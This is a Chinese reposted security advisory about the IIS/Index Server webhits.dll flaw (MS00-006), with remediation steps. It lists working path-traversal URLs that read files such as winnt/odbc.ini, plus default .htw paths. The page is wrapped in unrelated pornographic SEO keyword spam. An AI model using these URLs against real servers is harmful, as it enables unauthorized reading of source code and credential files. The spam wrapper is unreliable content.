六月婷婷综合激情-六月婷婷综合-六月婷婷在线观看-六月婷婷在线-亚洲黄色在线网站-亚洲黄色在线观看网站

明輝手游網(wǎng)中心:是一個(gè)免費(fèi)提供流行視頻軟件教程、在線學(xué)習(xí)分享的學(xué)習(xí)平臺(tái)!

ASP漏洞集-虛擬web目錄容易泄露ASP源代碼 (MS,缺陷)

發(fā)表時(shí)間:2024-02-08 來(lái)源:明輝站整理相關(guān)軟件相關(guān)文章人氣:

[摘要]涉及程序:Microsoft Internet Information Server/Index Server描述:震撼安全發(fā)現(xiàn):新的漏洞允許查看web服務(wù)器上任何文件包括ASP源碼詳細(xì):IIS4.0上有一個(gè)應(yīng)用程序映射htw--->webhits.dll,這是用于Index Server的...

涉及程序:
Microsoft Internet Information Server/Index Server
描述:
震撼安全發(fā)現(xiàn):新的漏洞允許查看web服務(wù)器上任何文件包括ASP源碼
詳細(xì):
IIS4.0上有一個(gè)應(yīng)用程序映射htw--->webhits.dll,這是用于Index Server的點(diǎn)擊功能的。盡管你不運(yùn)行Index Server,該映
射仍然有效。這個(gè)應(yīng)用程序映射存在漏洞,允許入侵者讀取本地硬盤(pán)上的文件,數(shù)據(jù)庫(kù)文件,和ASP源代碼!
有兩種方法來(lái)實(shí)現(xiàn),第一,如果你的web server上存在.htw后綴的文件,則可以過(guò)下面的方式來(lái)查看文件內(nèi)容,比如查看
odbc.ini文件的內(nèi)容:
http://www.xxx.com/iissamples/issamples/oop/qfullhit.htw?
CiWebHitsFile=/../../winnt/odbc.ini&CiRestriction=none&CiHiliteType=Full
對(duì)于IIS的一般安裝模式可以在下列位置找到.htw文件:
/iissamples/issamples/oop/qfullhit.htw
/iissamples/issamples/oop/qsumrhit.htw
/iissamples/exair/search/qfullhit.htw
/iissamples/exair/search/qsumrhit.htw
/iishelp/iis/misc/iirturnh.htw
第二、如果你的web server上不存在這個(gè)文件,有漏洞的系統(tǒng)仍然允許用戶調(diào)用webhits.dll,具體方式如下:
http://www.xxx.com/default.htm .htw?
CiWebHitsFile=/../../winnt/odbc.ini&CiRestriction=none&CiHiliteType=Full
條件是default.htm必須存在。這個(gè)文件名可以是其它文件,但必須存在。webhits.dll將會(huì)把這個(gè)文件作為臨時(shí)文件打開(kāi)。當(dāng)上
述URL中的空格符 達(dá)到一定數(shù)目時(shí),web服務(wù)的識(shí)別功能可能會(huì)出現(xiàn)問(wèn)題,這樣webhits.dll將打開(kāi)指定的文件
\winnt\odbc.ini。如果成功,用同樣的方法可以打開(kāi)更多的文件,包括ASP代碼。近似的原理請(qǐng)見(jiàn)下面這段代碼:
FILE *fd;
int DoesTemplateExist(char *pathtohtwfile)
{
// Just in case inetinfo.exe passes too long a string
// let's make sure it's of a suitable length and not
// going to open a buffer overrun vulnerability
char *file;
file = (char *)malloc(250);
strncpy(file,pathtohtwfile,250);
fd = fopen(file,"r");
// Success
if(fd !=NULL)
{
return 1;
}
// failed
else
{
return 0;
}
}
解決方案:
不使用index server功能的用戶,可以在IIS管理控制臺(tái)中,點(diǎn) web站點(diǎn),屬性,選擇主目錄,配置(起始點(diǎn)),應(yīng)用程序映射,
將htw與webhits.dll的映射刪除。
如果要用到webhits.dll,則使用下面的補(bǔ)丁:
Index Server 2.0(Intel機(jī)器)的補(bǔ)丁
Index Server 2.0(Alpha機(jī)器)的補(bǔ)丁
Windows2000的Index Server服務(wù)補(bǔ)丁
安全建議:
建議在IIS控制臺(tái)中刪除無(wú)用的應(yīng)用程序映射
相關(guān)站點(diǎn):
http://www.microsoft.com/technet/security/bulletin/ms00-006.asp
from: http://www.cnns.net/article/db/49.htm





主站蜘蛛池模板: 四虎永久在线精品网址 | 日韩视频免费看 | 色爱综合网欧美 | 欧美亚洲欧美 | 人人爽天天爽夜夜爽曰 | 欧美一级亚洲一级 | 中文字幕一区二区三区免费视频 | 亚洲一区二区免费看 | 四虎.com | 在线观看视频中文字幕 | 欧洲性大片xxxxx久久久 | 日本成人在线网站 | 天天碰人人 | 日本美女视频韩国视频网站免费 | 日本欧洲亚洲一区在线观看 | 日本aⅴ在线 | 天天摸日日摸人人看 | 日日摸人人看97人人澡 | 中日韩国语视频在线观看 | 日韩经典在线 | 午夜精品久久久久久影视riav | 婷婷九月 | 四虎国产永久免费久久 | 日韩 欧美 亚洲国产 | 欧美视频在线观看网站 | 日本一区二区三区在线看 | 亚洲第一免费网站 | 日本免费不卡视频一区二区三区 | 日韩免费在线观看视频 | 亚洲欧美日韩第一页 | 在线视频亚洲 | 亚洲精品乱码久久久久久中文字幕 | 日日噜噜夜夜躁躁狠狠 | 欧洲精品视频在线观看 | 亚洲欧洲色天使日韩精品 | 伊人剧场 | 中文字幕第一页亚洲 | 日本不卡视频在线视频观看 | 一区在线观看 | 婷婷网五月天天综合天天爱 | 熟女毛片 |